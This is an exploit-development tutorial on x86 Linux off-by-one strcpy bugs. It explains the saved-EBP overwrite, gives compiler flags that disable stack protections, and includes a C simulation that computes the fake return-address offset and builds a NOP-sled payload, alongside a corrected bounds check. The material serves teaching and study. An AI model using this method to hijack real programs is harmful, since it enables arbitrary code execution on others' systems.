Linux (x86) Exploit Development Series 3: Off-by-one


What is an off-by-one bug?

Copying a source string into a destination buffer results in an off-by-one when

  1. the source string length is equal to the destination buffer length.

When the source string length equals the destination buffer length, strcpy still appends the terminating NULL byte, and that single NULL byte is written one byte past the end of the destination buffer. Here the destination buffer lives on the stack, so the NULL byte can overwrite the least significant byte (LSB) of the caller's EBP saved on the stack, and this can lead to arbitrary code execution. (On the stack, the NULL overwrites the low byte of the saved EBP.)

 

How is arbitrary code execution achieved?

Arbitrary code execution is achieved using a technique called "EBP overwrite". If the caller's saved EBP is located immediately above the destination buffer, then after strcpy the single NULL byte will have overwritten the least significant byte of the caller's EBP. When the caller later executes its own `leave; ret`, `leave` loads ESP from the corrupted EBP, so `ret` pops its return address from corrupted EBP + 4, a location that now lies inside the attacker-controlled destination buffer.

 

Alignment

gcc -fno-stack-protector -z execstack -mpreferred-stack-boundary=2 -o vuln vuln.c

-mpreferred-stack-boundary=2 aligns the stack to 4 bytes (2^2), so no padding is inserted between the destination buffer and the saved EBP; with the default 16-byte alignment the NULL byte may land in padding instead. -fno-stack-protector removes the canary that would otherwise sit between the buffer and the saved EBP, and -z execstack makes the stack executable so shellcode in the buffer can run.

 

Test Step 1: Is an EBP overwrite, and thus a return address overwrite, possible?

Test Step 2: What is the offset from the destination buffer, i.e. where inside the buffer the fake return address must be placed (corrupted EBP + 4 minus the buffer's start address)?
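The frame layout and the two test steps above, as an added worked example that is not the tutorial's vuln.c: it models bar()'s stack frame (buf[256], then the caller's saved EBP, then bar()'s return address, as -mpreferred-stack-boundary=2 lays it out) as a byte array with explicit little-endian accessors, applies exactly the bytes strcpy writes for a 256-byte argument, and computes where foo()'s `leave; ret` will fetch its return address. The addresses 0xbffff5f0 (buf), 0xbffff6f8 (saved EBP), 0x08048450 (return address) and the NOP sled standing in for shellcode are constructed assumptions; the hardened bar_fixed() with the `>=` length check is also mine, not the tutorial's.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example, not the tutorial's vuln.c: a byte-array model of bar()'s
 * stack frame as laid out with -mpreferred-stack-boundary=2 (buf[256], then
 * the caller's saved EBP, then bar()'s return address, no padding between).
 * The addresses below are constructed for illustration. */
#define BUF_SIZE   256
#define EBP_OFF    BUF_SIZE        /* caller's saved EBP */
#define RET_OFF    (BUF_SIZE + 4)  /* bar()'s return address */
#define FRAME_SIZE (BUF_SIZE + 8)
#define BUF_ADDR   0xbffff5f0u     /* assumed address of buf[0] */
#define CALLER_EBP 0xbffff6f8u     /* assumed saved EBP (foo's frame) */
#define BAR_RET    0x08048450u     /* assumed return address into foo() */

static uint8_t frame[FRAME_SIZE];  /* the simulated stack frame */

/* Explicit 32-bit little-endian accessors, as on x86. */
static void put32(uint8_t *p, uint32_t v) { p[0] = v; p[1] = v >> 8; p[2] = v >> 16; p[3] = v >> 24; }
static uint32_t get32(const uint8_t *p) {
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}
static void frame_init(void) {
    memset(frame, 0xcc, FRAME_SIZE);
    put32(frame + EBP_OFF, CALLER_EBP);
    put32(frame + RET_OFF, BAR_RET);
}
static uint32_t saved_ebp(void) { return get32(frame + EBP_OFF); }

/* The tutorial's bar() as reached from main(): main() only rejects strlen(arg) > 256,
 * so a 256-byte argument passes and strcpy writes 257 bytes, the last being the NUL
 * that lands on the low byte of the saved EBP. */
static int bar_vulnerable(const char *arg) {
    size_t n = strlen(arg);
    if (n > BUF_SIZE) return -1;   /* "Attempting Buffer Overflow attack" */
    memcpy(frame, arg, n + 1);     /* exactly the bytes strcpy writes */
    return 0;
}
/* Corrected check: the NUL needs a slot too, so reject n >= sizeof(buf). */
static int bar_fixed(const char *arg) {
    size_t n = strlen(arg);
    if (n >= BUF_SIZE) return -1;
    memcpy(frame, arg, n + 1);
    return 0;
}

/* Test step 2: foo()'s `leave` does mov esp,ebp / pop ebp with the corrupted EBP,
 * so its `ret` pops from corrupted EBP + 4. Returns that slot's offset from buf[0],
 * or -1 if it lies outside buf (then the attacker does not control it). */
static int fake_ret_offset(void) {
    uint32_t slot = saved_ebp() + 4;
    if (slot < BUF_ADDR || slot + 4 > BUF_ADDR + BUF_SIZE) return -1;
    return (int)(slot - BUF_ADDR);
}
/* Address foo()'s ret jumps to: the dword at corrupted EBP + 4. */
static uint32_t foo_return_target(void) {
    int off = fake_ret_offset();
    return off < 0 ? 0 : get32(frame + off);
}
/* 256-byte argument: NOP sled standing in for shellcode, with the fake
 * return address written at `slot`. Must contain no 0x00 byte. */
static void build_payload(char *out, int slot, uint32_t target) {
    memset(out, 0x90, BUF_SIZE);
    put32((uint8_t *)out + slot, target);
    out[BUF_SIZE] = '\0';
}

/* Test step 1: copy 256 'A's and read saved EBP back (0xbffff6f8 -> 0xbffff600). */
uint32_t demo_step1_saved_ebp(void) {
    char arg[BUF_SIZE + 1];
    memset(arg, 'A', BUF_SIZE); arg[BUF_SIZE] = '\0';
    frame_init();
    bar_vulnerable(arg);
    return saved_ebp();
}
/* Test step 2: where in buf the fake return address must go (20 here). */
int demo_step2_offset(void) {
    demo_step1_saved_ebp();
    return fake_ret_offset();
}
/* Full chain: the fake return address points just past its own slot, into
 * the sled, and that is where foo() returns. Returns 0 on failure. */
uint32_t demo_exploit_target(void) {
    char arg[BUF_SIZE + 1];
    int slot = demo_step2_offset();
    if (slot < 0) return 0;
    frame_init();
    build_payload(arg, slot, BUF_ADDR + slot + 4);
    if (strlen(arg) != BUF_SIZE || bar_vulnerable(arg) != 0) return 0;
    return foo_return_target();
}
/* Hardened bar(): the same payload is rejected and saved EBP stays intact. */
int demo_fixed_keeps_ebp(void) {
    char arg[BUF_SIZE + 1];
    build_payload(arg, 20, BUF_ADDR + 24);
    frame_init();
    return bar_fixed(arg) == -1 && saved_ebp() == CALLER_EBP;
}

int main(void) {
    printf("saved EBP after copy : 0x%08x\n", (unsigned)demo_step1_saved_ebp());
    printf("fake ret slot offset : %d\n", demo_step2_offset());
    printf("foo() returns to     : 0x%08x\n", (unsigned)demo_exploit_target());
    printf("fixed bar() intact   : %d\n", demo_fixed_keeps_ebp());
    return 0;
}
```

Two things the model makes visible that the real binary only shows in gdb: bar()'s own return address at RET_OFF is never touched, so a plain crash is not the symptom to look for in step 1, and the corrupted EBP only gives control when EBP + 4 falls back inside buf, which is why the real stack addresses (and hence the alignment flag) matter for step 2.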

 

When the program is started through Python's subprocess.call, the stack addresses differ from those seen when it is run directly from the terminal.

Spawning it as a child process shifts the stack, because the environment strings and program path that the kernel places at the top of the stack at process start differ in size between the two launches.
